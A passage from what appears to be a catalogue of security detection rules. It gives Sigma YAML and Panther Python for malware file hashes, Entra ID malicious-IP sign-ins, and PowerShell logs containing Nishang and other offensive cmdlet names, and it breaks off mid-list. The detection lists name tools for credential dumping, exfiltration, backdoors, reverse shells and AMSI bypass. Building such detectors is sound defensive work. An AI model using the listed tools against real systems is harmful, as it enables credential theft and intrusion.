            - 'SHA256=4dc24fd07f8fb854e685bc540359c59f177de5b91231cc44d6231e33c9e932b1'
            - 'SHA256=82b0e1d7a27b67f0e6dc39dc41e880bdaef5d1f69fcec38e08da2ed78e805ef9'
            - 'SHA256=ad938d15ecfd70083c474e1642a88b078c3cea02cdbddf66d4fb1c01b9b29d9a'
            - 'SHA256=443c0ba980d4db9213b654a45248fd855855c1cc81d18812cae9d16729ff9a85'
            - 'SHA256=f3ec3f22639d45b3c865bb1ed7622db32e04e1dbc456298be02bf1f3875c3aac'
            - 'SHA256=0181d60506b1f3609217487c2c737621d637e1232f243f68c662d045f44d4873'
            - 'SHA256=c13f5bc4edfbe8f1884320c5d76ca129d00de41a1e61d45195738f125dfe60a7'
            - 'SHA256=8684aec77b4c3cafc1a6594de7e95695fa698625d4206a6c4b201875f76a5b38'
            - 'SHA256=c4c9c84b211899ceb0d18a839afa497537a7c7c01ab481965a09788a9e16590c'
            - 'SHA256=d37996abc8efb29f1ccbb4335ce9ba9158bec86cc4775f0177112e87e4e3be5c'
            - 'SHA256=1a5c08d40a5e73b9fe63ea5761eaec8f41d916ca3da2acbc4e6e799b06af5524'
            - 'SHA256=9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51'
            - 'SHA256=bb2422e96ea993007f25c71d55b2eddfa1e940c89e895abb50dd07d7c17ca1df'
            - 'SHA256=94c71954ac0b1fd9fa2bd5c506a16302100ba75d9f84f39ee9b333546c714601'
            - 'SHA256=6d68d8a71a11458ddf0cbb73c0f145bee46ef29ce03ad7ece6bd6aa9d31db9b7'
            - 'SHA256=80e4c83cfa9d675a6746ab846fa5da76d79e87a9297e94e595a2d781e02673b3'
            - 'SHA256=e858de280bd72d7538386a73e579580a6d5edba87b66b3671dc180229368be19'
            - 'SHA256=ee7b8eb150df2788bb9d5fe468327899d9f60d6731c379fd75143730a83b1c55'
            - 'SHA256=8206ce9c42582ac980ff5d64f8e3e310bc2baa42d1a206dd831c6ab397fbd8fe'
            - 'SHA256=4f02aed3750bc6a924c75e774404f259f721d8f4081ed68aa01cf73ca5430f85'
            - 'SHA256=81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1'
            - 'SHA256=0f98492c92e35042b09032e3d9aedc357e4df94fc840217fa1091046f9248a06'
            - 'SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c'
            - 'SHA256=b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3'
            - 'SHA256=26ef7b27d1afb685e0c136205a92d29b1091e3dcf6b7b39a4ec03fbbdb57cb55'
            - 'SHA256=a1e6b431534258954db07039117b3159e889c6b9e757329bbd4126383c60c778'
            - 'SHA256=d25b5e4d07f594c640dcd93cfc8ab3f0a38348150bd0bfae89f404fbb0d811c6'
            - 'SHA256=1ef7afea0cf2ef246ade6606ef8b7195de9cd7a3cd7570bff90ba1e2422276f6'
            - 'SHA256=083a311875173f8c4653e9bbbabb689d14aa86b852e7fa9f5512fc60e0fd2c43'
            - 'SHA256=89698cad598a56f9e45efffd15d1841e494a2409cc12279150a03842cd6bb7f3'
            - 'SHA256=a7a665a695ec3c0f862a0d762ad55aff6ce6014359647e7c7f7e3c4dc3be81b7'
            - 'SHA256=02ebf848fa618eba27065db366b15ee6629d98f551d20612ac38b9f655f37715'
            - 'SHA256=8b32fc8b15363915605c127ccbf5cbe71778f8dfbf821a25455496e969a01434'
            - 'SHA256=ee525b90053bb30908b5d7bf4c5e9b8b9d6b7b5c9091a26fa25d30d3ad8ef5d0'
            - 'SHA256=41ad660820c41fc8b1860b13dc1fea8bc8cb2faceb36ed3e29d40d28079d2b1f'
            - 'SHA256=42ff11ddb46dfe5fa895e7babf88ee27790cde53a9139fc384346a89e802a327'
            - 'SHA256=36f45a42ebf2de6962db92aaf8845d7f9fd6895bedc31422adcf31c59a79602d'
            - 'SHA256=4bd4715d2a7af627da11513e32fab925c872babebdb7ff5675a75815fbf95021'
            - 'SHA256=4734a0a5d88f44a4939b8d812364cab6ca5f611b9b8ceebe27df6c1ed3a6d8a4'
            - 'SHA256=e8743094f002239a8a9d6d7852c7852e0bb63cd411b007bd8c194bcba159ef15'
            - 'SHA256=f0474e76cfd36e37e32cfe5c0a9e05ddee17dd5014d7aa8817ea3634a3540a3f'
            - 'SHA256=a0931e16cf7b18d15579e36e0a69edad1717b07527b5407f2c105a2f554224b2'
            - 'SHA256=52d5c35325ce701516f8b04380c9fbdb78ec6bcc13b444f758fdb03d545b0677'
            - 'SHA256=e1cb86386757b947b39086cc8639da988f6e8018ca9995dd669bdc03c8d39d7d'
            - 'SHA256=7662187c236003308a7951c2f49c0768636c492f8935292d02f69e59b01d236d'
            - 'SHA256=24c900024d213549502301c366d18c318887630f04c96bf0a3d6ba74e0df164f'
            - 'SHA256=b7956e31c2fcc0a84bcedf30e5f8115f4e74eed58916253a0c05c8be47283c57'
            - 'SHA256=96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc'
            - 'SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c'
            - 'SHA256=0d676baac43d9e2d05b577d5e0c516fba250391ab0cb11232a4b17fd97a51e35'
            - 'SHA256=888491196bd8ff528b773a3e453eae49063ad31fb4ca0f9f2e433f8d35445440'
            - 'IMPHASH=8d070a93a45ed8ba6dba6bfbe0d084e7'
            - 'IMPHASH=7641a0c227f0a3a45b80bb8af43cd152'
            - 'IMPHASH=7df0d3ee663fc0e7c72a95e44ba4c82c'
            - 'IMPHASH=70e1caa5a322b56fd7951f1b2caacb0d'
            - 'IMPHASH=beceab354c66949088c9e5ed1f1ff2a4'
            - 'IMPHASH=caa08a0ba5f679b1e5bbae747cb9d626'
            - 'IMPHASH=420625b024fba72a24025defdf95b303'
            - 'IMPHASH=65ccc2c578a984c31880b6c5e65257d3'
            - 'IMPHASH=e717abe060bc5c34925fe3120ac22f45'
            - 'IMPHASH=41113a3a832353963112b94f4635a383'
            - 'IMPHASH=3866dd9fe63de457bdbf893bf7050ddf'
            - 'IMPHASH=3fd33d5b3b52e2db91983ac4b1d7a3c4'
            - 'IMPHASH=a998fe47a44bfbf2399968e21cfdf7ca'
            - 'IMPHASH=c9a6e83d931286d1604d1add8403e1e5'
            - 'IMPHASH=cf0eb2dce2ba2c9ff5dd0da794b8b372'
            - 'IMPHASH=ea37e43ffc7cfcba181c5cff37a9be1f'
            - 'IMPHASH=8e35c9460537092672b3c7c14bccc7e0'
            - 'IMPHASH=7bf14377888c429897eb10a85f70266c'
            - 'IMPHASH=b351627263648b1d220bb488e7ec7202'
            - 'IMPHASH=ce10082e1aa4c1c2bd953b4a7208e56a'
            - 'IMPHASH=a7bd820fa5b895fab06f20739c9f24b8'
            - 'IMPHASH=be0dd8b8e045356d600ee55a64d9d197'
            - 'IMPHASH=63fd1582ac2edee50f7ec7eedde38ee8'
            - 'IMPHASH=6c8d5c79a850eecc2fb0291cebda618d'
            - 'IMPHASH=c32d9a9af7f702814e1368c689877f3a'
            - 'IMPHASH=6b387c029257f024a43a73f38afb2629'
            - 'IMPHASH=df43355c636583e56e92142dcc69cc58'
            - 'IMPHASH=e3ee9131742bf9c9d43cb9a425e497dd'
            - 'IMPHASH=c214aac08575c139e48d04f5aee21585'
            - 'IMPHASH=3c5d2ffd06074f1b09c89465cc8bfbf7'
            - 'IMPHASH=059c6bd84285f4960e767f032b33f19b'
            - 'IMPHASH=a09170ef09c55cdca9472c02cb1f2647'
            - 'IMPHASH=fca0f3c7b6d79f494034b9d2a1f5921a'
            - 'IMPHASH=0262d4147f21d681f8519ab2af79283f'
            - 'IMPHASH=832219eb71b8bdb771f1d29d27b0acf4'
            - 'IMPHASH=514298d18002920ee5a917fc34426417'
            - 'IMPHASH=26ceec6572c630bdad60c984e51b7da4'
            - 'IMPHASH=dbf09dd3e675f15c7cc9b4d2b8e6cd90'
            - 'IMPHASH=4b47f6031c558106eee17655f8f8a32f'
            - 'IMPHASH=a6c4a7369500900fc172f9557cff22cf'
            - 'IMPHASH=3b49942ec6cef1898e97f741b2b5df8a'
            - 'IMPHASH=28dc68bb6d6bf4f6b2db8dd7588b2511'
            - 'IMPHASH=27f6dc8a247a22308dd1beba5086b302'
            - 'IMPHASH=7d017945bf90936a6c40f73f91ed02c2'
            - 'IMPHASH=d51f0f6034eb5e45f0ed4e9b7bbc9c97'
            - 'IMPHASH=0ad7da35304c75ccf859bc29fe9ed09e'
            - 'IMPHASH=bf9d32a6ab9effcd2fd6a734e5be98f9'
            - 'IMPHASH=87fd2b54ed568e2294300e164b8c46f7'
            - 'IMPHASH=2de3451f3e7b02970582bb8f9fd8c73a'
            - 'IMPHASH=e97dc162f416bf06745bf9ffdf78a0ff'
            - 'IMPHASH=2a008187d4a73284ddcc43f1b727b513'
            - 'IMPHASH=f8e4844312e81dbdb4e8e95e2ad2c127'
            - 'IMPHASH=4c7cc13a110ccdbb932bb9d7d42efdf4'
            - 'IMPHASH=45bfe170e0cd654bc1e2ae3fca3ac3f4'
            - 'IMPHASH=3db9de43d5d530c10d0cd2d43c7a0771'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Malicious IP Address Sign-In Failure Rate
Indicates a sign-in from an IP address that has been classified as malicious based on high sign-in failure rates.
status test author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' id a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd
panther query
def rule(event):
    if event.deep_get("riskEventType", default="") == "maliciousIPAddress":
        return True
    return False
view Sigma YAML
title: Malicious IP Address Sign-In Failure Rate
id: a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd
status: test
description: Indicates a sign-in from an IP address that has been classified as malicious based on high sign-in failure rates.
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
    - attack.t1090
    - attack.command-and-control
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'maliciousIPAddress'
    condition: selection
falsepositives:
    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
high
Malicious IP Address Sign-In Suspicious
Indicates a sign-in from an IP address that was known to be malicious at the time of the sign-in.
status test author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' id 36440e1c-5c22-467a-889b-593e66498472
panther query
def rule(event):
    if event.deep_get("riskEventType", default="") == "suspiciousIPAddress":
        return True
    return False
view Sigma YAML
title: Malicious IP Address Sign-In Suspicious
id: 36440e1c-5c22-467a-889b-593e66498472
status: test
description: Indicates a sign-in from an IP address that was known to be malicious at the time of the sign-in.
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
    - attack.t1090
    - attack.command-and-control
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'suspiciousIPAddress'
    condition: selection
falsepositives:
    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
high
Malicious Nishang PowerShell Commandlets
Detects cmdlet names and arguments from the Nishang PowerShell exploitation framework.
status test author Alec Costello id f772cee9-b7c2-4cb2-8f07-49870adc02e0
panther query
# Indicator strings mirror the ScriptBlockText|contains list in the Sigma
# selection below. Sigma string matching is case-insensitive, so both sides are
# lower-cased here instead of relying on the exact casing of each entry
# (the rendering with one case-sensitive `in` per entry missed e.g. "out-dnstxt").
NISHANG_INDICATORS = (
    "Add-ConstrainedDelegationBackdoor",
    "Copy-VSS",
    "Create-MultipleSessions",
    "DataToEncode",
    "DNS_TXT_Pwnage",
    "Do-Exfiltration-Dns",
    "Download_Execute",
    "Download-Execute-PS",
    "DownloadAndExtractFromRemoteRegistry",
    "DumpCerts",
    "DumpCreds",
    "DumpHashes",
    "Enable-DuplicateToken",
    "Enable-Duplication",
    "Execute-Command-MSSQL",
    "Execute-DNSTXT-Code",
    "Execute-OnTime",
    "ExetoText",
    "exfill",
    "ExfilOption",
    "FakeDC",
    "FireBuster",
    "FireListener",
    "Get-Information ",  # trailing space is required: avoids Get-InformationBarrierReport* false positives
    "Get-PassHints",
    "Get-Web-Credentials",
    "Get-WebCredentials",
    "Get-WLAN-Keys",
    "HTTP-Backdoor",
    "Invoke-AmsiBypass",
    "Invoke-BruteForce",
    "Invoke-CredentialsPhish",
    "Invoke-Decode",
    "Invoke-Encode",
    "Invoke-Interceptor",
    "Invoke-JSRatRegsvr",
    "Invoke-JSRatRundll",
    "Invoke-MimikatzWDigestDowngrade",
    "Invoke-NetworkRelay",
    "Invoke-PowerShellIcmp",
    "Invoke-PowerShellUdp",
    "Invoke-Prasadhak",
    "Invoke-PSGcat",
    "Invoke-PsGcatAgent",
    "Invoke-SessionGopher",
    "Invoke-SSIDExfil",
    "LoggedKeys",
    "Nishang",
    "NotAllNameSpaces",  # parameter of Set-RemoteWMI
    "Out-CHM",
    "OUT-DNSTXT",
    "Out-HTA",
    "Out-RundllCommand",
    "Out-SCF",
    "Out-SCT",
    "Out-Shortcut",
    "Out-WebQuery",
    "Out-Word",
    "Parse_Keys",
    "Password-List",
    "Powerpreter",
    "Remove-Persistence",
    "Remove-PoshRat",
    "Remove-Update",
    "Run-EXEonRemote",
    "Set-DCShadowPermissions",
    "Set-RemotePSRemoting",
    "Set-RemoteWMI",
    "Shellcode32",
    "Shellcode64",
    "StringtoBase64",
    "TexttoExe",
)


def rule(event):
    # Read the script block once; treat a missing or null field as "" so such events never match.
    script_block = (event.deep_get("ScriptBlockText", default="") or "").lower()
    return any(indicator.lower() in script_block for indicator in NISHANG_INDICATORS)
view Sigma YAML
title: Malicious Nishang PowerShell Commandlets
id: f772cee9-b7c2-4cb2-8f07-49870adc02e0
status: test
description: Detects cmdlet names and arguments from the Nishang PowerShell exploitation framework.
references:
    - https://github.com/samratashok/nishang
author: Alec Costello
date: 2019-05-16
modified: 2023-01-16
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - 'Add-ConstrainedDelegationBackdoor'
            # - 'Add-Persistence' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            # - 'Add-RegBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            # - 'Add-ScrnSaveBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Copy-VSS'
            - 'Create-MultipleSessions'
            - 'DataToEncode'
            - 'DNS_TXT_Pwnage'
            - 'Do-Exfiltration-Dns'
            - 'Download_Execute'
            - 'Download-Execute-PS'
            - 'DownloadAndExtractFromRemoteRegistry'
            - 'DumpCerts'
            - 'DumpCreds'
            - 'DumpHashes'
            - 'Enable-DuplicateToken'
            - 'Enable-Duplication'
            - 'Execute-Command-MSSQL'
            - 'Execute-DNSTXT-Code'
            - 'Execute-OnTime'
            - 'ExetoText'
            - 'exfill'
            - 'ExfilOption'
            - 'FakeDC'
            - 'FireBuster'
            - 'FireListener'
            - 'Get-Information ' # Space at the end is required. Otherwise, we get FP with Get-InformationBarrierReportDetails or Get-InformationBarrierReportSummary
            # - 'Get-PassHashes' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Get-PassHints'
            - 'Get-Web-Credentials'
            - 'Get-WebCredentials'
            - 'Get-WLAN-Keys'
            # - 'Gupt-Backdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'HTTP-Backdoor'
            # - 'Invoke-ADSBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Invoke-AmsiBypass'
            - 'Invoke-BruteForce'
            - 'Invoke-CredentialsPhish'
            - 'Invoke-Decode'
            - 'Invoke-Encode'
            - 'Invoke-Interceptor'
            - 'Invoke-JSRatRegsvr'
            - 'Invoke-JSRatRundll'
            - 'Invoke-MimikatzWDigestDowngrade'
            - 'Invoke-NetworkRelay'
            # - 'Invoke-PortScan' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            # - 'Invoke-PoshRatHttp' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Invoke-PowerShellIcmp'
            - 'Invoke-PowerShellUdp'
            - 'Invoke-Prasadhak'
            - 'Invoke-PSGcat'
            - 'Invoke-PsGcatAgent'
            # - 'Invoke-PsUACme' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Invoke-SessionGopher'
            - 'Invoke-SSIDExfil'
            # - Jitter  # Prone to FPs
            # - 'Keylogger' # Too generic to be linked to Nishang
            - 'LoggedKeys'
            - 'Nishang'
            - 'NotAllNameSpaces' # This is param to "Set-RemoteWMI"
            - 'Out-CHM'
            - 'OUT-DNSTXT'
            - 'Out-HTA'
            - 'Out-RundllCommand'
            - 'Out-SCF'
            - 'Out-SCT'
            - 'Out-Shortcut'
            - 'Out-WebQuery'
            - 'Out-Word'
            - 'Parse_Keys'
            - 'Password-List'
            - 'Powerpreter'
            - 'Remove-Persistence'
            - 'Remove-PoshRat'
            - 'Remove-Update'
            - 'Run-EXEonRemote'
            - 'Set-DCShadowPermissions'
            - 'Set-RemotePSRemoting'
            - 'Set-RemoteWMI'
            - 'Shellcode32'
            - 'Shellcode64'
            - 'StringtoBase64'
            - 'TexttoExe'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Malicious PowerShell Commandlets - PoshModule
Detects Commandlet names from well-known PowerShell exploitation frameworks
status test author Nasreddine Bencherchali (Nextron Systems) id 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
panther query
def rule(event):
    if any(
        [
            "Add-Exfiltration" in event.deep_get("Payload", default=""),
            "Add-Persistence" in event.deep_get("Payload", default=""),
            "Add-RegBackdoor" in event.deep_get("Payload", default=""),
            "Add-RemoteRegBackdoor" in event.deep_get("Payload", default=""),
            "Add-ScrnSaveBackdoor" in event.deep_get("Payload", default=""),
            "BadSuccessor" in event.deep_get("Payload", default=""),
            "Check-VM" in event.deep_get("Payload", default=""),
            "ConvertTo-Rc4ByteStream" in event.deep_get("Payload", default=""),
            "Decrypt-Hash" in event.deep_get("Payload", default=""),
            "Disable-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Disable-MachineAccount" in event.deep_get("Payload", default=""),
            "Do-Exfiltration" in event.deep_get("Payload", default=""),
            "Enable-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Enable-MachineAccount" in event.deep_get("Payload", default=""),
            "Enabled-DuplicateToken" in event.deep_get("Payload", default=""),
            "Exploit-Jboss" in event.deep_get("Payload", default=""),
            "Export-ADR" in event.deep_get("Payload", default=""),
            "Export-ADRCSV" in event.deep_get("Payload", default=""),
            "Export-ADRExcel" in event.deep_get("Payload", default=""),
            "Export-ADRHTML" in event.deep_get("Payload", default=""),
            "Export-ADRJSON" in event.deep_get("Payload", default=""),
            "Export-ADRXML" in event.deep_get("Payload", default=""),
            "Find-Fruit" in event.deep_get("Payload", default=""),
            "Find-GPOLocation" in event.deep_get("Payload", default=""),
            "Find-TrustedDocuments" in event.deep_get("Payload", default=""),
            "Get-ADIDNS" in event.deep_get("Payload", default=""),
            "Get-ApplicationHost" in event.deep_get("Payload", default=""),
            "Get-ChromeDump" in event.deep_get("Payload", default=""),
            "Get-ClipboardContents" in event.deep_get("Payload", default=""),
            "Get-FoxDump" in event.deep_get("Payload", default=""),
            "Get-GPPPassword" in event.deep_get("Payload", default=""),
            "Get-IndexedItem" in event.deep_get("Payload", default=""),
            "Get-KerberosAESKey" in event.deep_get("Payload", default=""),
            "Get-Keystrokes" in event.deep_get("Payload", default=""),
            "Get-LSASecret" in event.deep_get("Payload", default=""),
            "Get-MachineAccountAttribute" in event.deep_get("Payload", default=""),
            "Get-MachineAccountCreator" in event.deep_get("Payload", default=""),
            "Get-PassHashes" in event.deep_get("Payload", default=""),
            "Get-RegAlwaysInstallElevated" in event.deep_get("Payload", default=""),
            "Get-RegAutoLogon" in event.deep_get("Payload", default=""),
            "Get-RemoteBootKey" in event.deep_get("Payload", default=""),
            "Get-RemoteCachedCredential" in event.deep_get("Payload", default=""),
            "Get-RemoteLocalAccountHash" in event.deep_get("Payload", default=""),
            "Get-RemoteLSAKey" in event.deep_get("Payload", default=""),
            "Get-RemoteMachineAccountHash" in event.deep_get("Payload", default=""),
            "Get-RemoteNLKMKey" in event.deep_get("Payload", default=""),
            "Get-RickAstley" in event.deep_get("Payload", default=""),
            "Get-Screenshot" in event.deep_get("Payload", default=""),
            "Get-SecurityPackages" in event.deep_get("Payload", default=""),
            "Get-ServiceFilePermission" in event.deep_get("Payload", default=""),
            "Get-ServicePermission" in event.deep_get("Payload", default=""),
            "Get-ServiceUnquoted" in event.deep_get("Payload", default=""),
            "Get-SiteListPassword" in event.deep_get("Payload", default=""),
            "Get-System" in event.deep_get("Payload", default=""),
            "Get-TimedScreenshot" in event.deep_get("Payload", default=""),
            "Get-UnattendedInstallFile" in event.deep_get("Payload", default=""),
            "Get-Unconstrained" in event.deep_get("Payload", default=""),
            "Get-USBKeystrokes" in event.deep_get("Payload", default=""),
            "Get-VaultCredential" in event.deep_get("Payload", default=""),
            "Get-VulnAutoRun" in event.deep_get("Payload", default=""),
            "Get-VulnSchTask" in event.deep_get("Payload", default=""),
            "Grant-ADIDNSPermission" in event.deep_get("Payload", default=""),
            "Gupt-Backdoor" in event.deep_get("Payload", default=""),
            "HTTP-Login" in event.deep_get("Payload", default=""),
            "Install-ServiceBinary" in event.deep_get("Payload", default=""),
            "Install-SSP" in event.deep_get("Payload", default=""),
            "Invoke-ACLScanner" in event.deep_get("Payload", default=""),
            "Invoke-ADRecon" in event.deep_get("Payload", default=""),
            "Invoke-ADSBackdoor" in event.deep_get("Payload", default=""),
            "Invoke-AgentSmith" in event.deep_get("Payload", default=""),
            "Invoke-AllChecks" in event.deep_get("Payload", default=""),
            "Invoke-ARPScan" in event.deep_get("Payload", default=""),
            "Invoke-AzureHound" in event.deep_get("Payload", default=""),
            "Invoke-BackdoorLNK" in event.deep_get("Payload", default=""),
            "Invoke-BadPotato" in event.deep_get("Payload", default=""),
            "Invoke-BetterSafetyKatz" in event.deep_get("Payload", default=""),
            "Invoke-BypassUAC" in event.deep_get("Payload", default=""),
            "Invoke-Carbuncle" in event.deep_get("Payload", default=""),
            "Invoke-Certify" in event.deep_get("Payload", default=""),
            "Invoke-ConPtyShell" in event.deep_get("Payload", default=""),
            "Invoke-CredentialInjection" in event.deep_get("Payload", default=""),
            "Invoke-DAFT" in event.deep_get("Payload", default=""),
            "Invoke-DCSync" in event.deep_get("Payload", default=""),
            "Invoke-DinvokeKatz" in event.deep_get("Payload", default=""),
            "Invoke-DllInjection" in event.deep_get("Payload", default=""),
            "Invoke-DNSUpdate" in event.deep_get("Payload", default=""),
            "Invoke-DNSExfiltrator" in event.deep_get("Payload", default=""),
            "Invoke-DomainPasswordSpray" in event.deep_get("Payload", default=""),
            "Invoke-DowngradeAccount" in event.deep_get("Payload", default=""),
            "Invoke-EgressCheck" in event.deep_get("Payload", default=""),
            "Invoke-Eyewitness" in event.deep_get("Payload", default=""),
            "Invoke-FakeLogonScreen" in event.deep_get("Payload", default=""),
            "Invoke-Farmer" in event.deep_get("Payload", default=""),
            "Invoke-Get-RBCD-Threaded" in event.deep_get("Payload", default=""),
            "Invoke-Gopher" in event.deep_get("Payload", default=""),
            "Invoke-Grouper" in event.deep_get("Payload", default=""),
            "Invoke-HandleKatz" in event.deep_get("Payload", default=""),
            "Invoke-ImpersonatedProcess" in event.deep_get("Payload", default=""),
            "Invoke-ImpersonateSystem" in event.deep_get("Payload", default=""),
            "Invoke-InteractiveSystemPowerShell" in event.deep_get("Payload", default=""),
            "Invoke-Internalmonologue" in event.deep_get("Payload", default=""),
            "Invoke-Inveigh" in event.deep_get("Payload", default=""),
            "Invoke-InveighRelay" in event.deep_get("Payload", default=""),
            "Invoke-KrbRelay" in event.deep_get("Payload", default=""),
            "Invoke-LdapSignCheck" in event.deep_get("Payload", default=""),
            "Invoke-Lockless" in event.deep_get("Payload", default=""),
            "Invoke-MalSCCM" in event.deep_get("Payload", default=""),
            "Invoke-Mimikatz" in event.deep_get("Payload", default=""),
            "Invoke-Mimikittenz" in event.deep_get("Payload", default=""),
            "Invoke-MITM6" in event.deep_get("Payload", default=""),
            "Invoke-NanoDump" in event.deep_get("Payload", default=""),
            "Invoke-NetRipper" in event.deep_get("Payload", default=""),
            "Invoke-Nightmare" in event.deep_get("Payload", default=""),
            "Invoke-NinjaCopy" in event.deep_get("Payload", default=""),
            "Invoke-OfficeScrape" in event.deep_get("Payload", default=""),
            "Invoke-OxidResolver" in event.deep_get("Payload", default=""),
            "Invoke-P0wnedshell" in event.deep_get("Payload", default=""),
            "Invoke-Paranoia" in event.deep_get("Payload", default=""),
            "Invoke-PortScan" in event.deep_get("Payload", default=""),
            "Invoke-PoshRatHttp" in event.deep_get("Payload", default=""),
            "Invoke-PostExfil" in event.deep_get("Payload", default=""),
            "Invoke-PowerDump" in event.deep_get("Payload", default=""),
            "Invoke-PowerDPAPI" in event.deep_get("Payload", default=""),
            "Invoke-PowerShellTCP" in event.deep_get("Payload", default=""),
            "Invoke-PowerShellWMI" in event.deep_get("Payload", default=""),
            "Invoke-PPLDump" in event.deep_get("Payload", default=""),
            "Invoke-PsExec" in event.deep_get("Payload", default=""),
            "Invoke-PSInject" in event.deep_get("Payload", default=""),
            "Invoke-PsUaCme" in event.deep_get("Payload", default=""),
            "Invoke-ReflectivePEInjection" in event.deep_get("Payload", default=""),
            "Invoke-ReverseDNSLookup" in event.deep_get("Payload", default=""),
            "Invoke-Rubeus" in event.deep_get("Payload", default=""),
            "Invoke-RunAs" in event.deep_get("Payload", default=""),
            "Invoke-SafetyKatz" in event.deep_get("Payload", default=""),
            "Invoke-SauronEye" in event.deep_get("Payload", default=""),
            "Invoke-SCShell" in event.deep_get("Payload", default=""),
            "Invoke-Seatbelt" in event.deep_get("Payload", default=""),
            "Invoke-ServiceAbuse" in event.deep_get("Payload", default=""),
            "Invoke-ShadowSpray" in event.deep_get("Payload", default=""),
            "Invoke-Sharp" in event.deep_get("Payload", default=""),
            "Invoke-Shellcode" in event.deep_get("Payload", default=""),
            "Invoke-SMBScanner" in event.deep_get("Payload", default=""),
            "Invoke-Snaffler" in event.deep_get("Payload", default=""),
            "Invoke-Spoolsample" in event.deep_get("Payload", default=""),
            "Invoke-SpraySinglePassword" in event.deep_get("Payload", default=""),
            "Invoke-SSHCommand" in event.deep_get("Payload", default=""),
            "Invoke-StandIn" in event.deep_get("Payload", default=""),
            "Invoke-StickyNotesExtract" in event.deep_get("Payload", default=""),
            "Invoke-SystemCommand" in event.deep_get("Payload", default=""),
            "Invoke-Tasksbackdoor" in event.deep_get("Payload", default=""),
            "Invoke-Tater" in event.deep_get("Payload", default=""),
            "Invoke-Thunderfox" in event.deep_get("Payload", default=""),
            "Invoke-ThunderStruck" in event.deep_get("Payload", default=""),
            "Invoke-TokenManipulation" in event.deep_get("Payload", default=""),
            "Invoke-Tokenvator" in event.deep_get("Payload", default=""),
            "Invoke-TotalExec" in event.deep_get("Payload", default=""),
            "Invoke-UrbanBishop" in event.deep_get("Payload", default=""),
            "Invoke-UserHunter" in event.deep_get("Payload", default=""),
            "Invoke-VoiceTroll" in event.deep_get("Payload", default=""),
            "Invoke-Whisker" in event.deep_get("Payload", default=""),
            "Invoke-WinEnum" in event.deep_get("Payload", default=""),
            "Invoke-winPEAS" in event.deep_get("Payload", default=""),
            "Invoke-WireTap" in event.deep_get("Payload", default=""),
            "Invoke-WmiCommand" in event.deep_get("Payload", default=""),
            "Invoke-WMIExec" in event.deep_get("Payload", default=""),
            "Invoke-WScriptBypassUAC" in event.deep_get("Payload", default=""),
            "Invoke-Zerologon" in event.deep_get("Payload", default=""),
            "MailRaider" in event.deep_get("Payload", default=""),
            "New-ADIDNSNode" in event.deep_get("Payload", default=""),
            "New-DNSRecordArray" in event.deep_get("Payload", default=""),
            "New-HoneyHash" in event.deep_get("Payload", default=""),
            "New-InMemoryModule" in event.deep_get("Payload", default=""),
            "New-MachineAccount" in event.deep_get("Payload", default=""),
            "New-SOASerialNumberArray" in event.deep_get("Payload", default=""),
            "Out-Minidump" in event.deep_get("Payload", default=""),
            "Port-Scan" in event.deep_get("Payload", default=""),
            "PowerBreach" in event.deep_get("Payload", default=""),
            "powercat " in event.deep_get("Payload", default=""),
            "PowerUp" in event.deep_get("Payload", default=""),
            "PowerView" in event.deep_get("Payload", default=""),
            "Remove-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Remove-MachineAccount" in event.deep_get("Payload", default=""),
            "Remove-Update" in event.deep_get("Payload", default=""),
            "Rename-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Revoke-ADIDNSPermission" in event.deep_get("Payload", default=""),
            "Set-ADIDNSNode" in event.deep_get("Payload", default=""),
            "Set-MacAttribute" in event.deep_get("Payload", default=""),
            "Set-MachineAccountAttribute" in event.deep_get("Payload", default=""),
            "Set-Wallpaper" in event.deep_get("Payload", default=""),
            "Show-TargetScreen" in event.deep_get("Payload", default=""),
            "Start-CaptureServer" in event.deep_get("Payload", default=""),
            "Start-Dnscat2" in event.deep_get("Payload", default=""),
            "Start-WebcamRecorder" in event.deep_get("Payload", default=""),
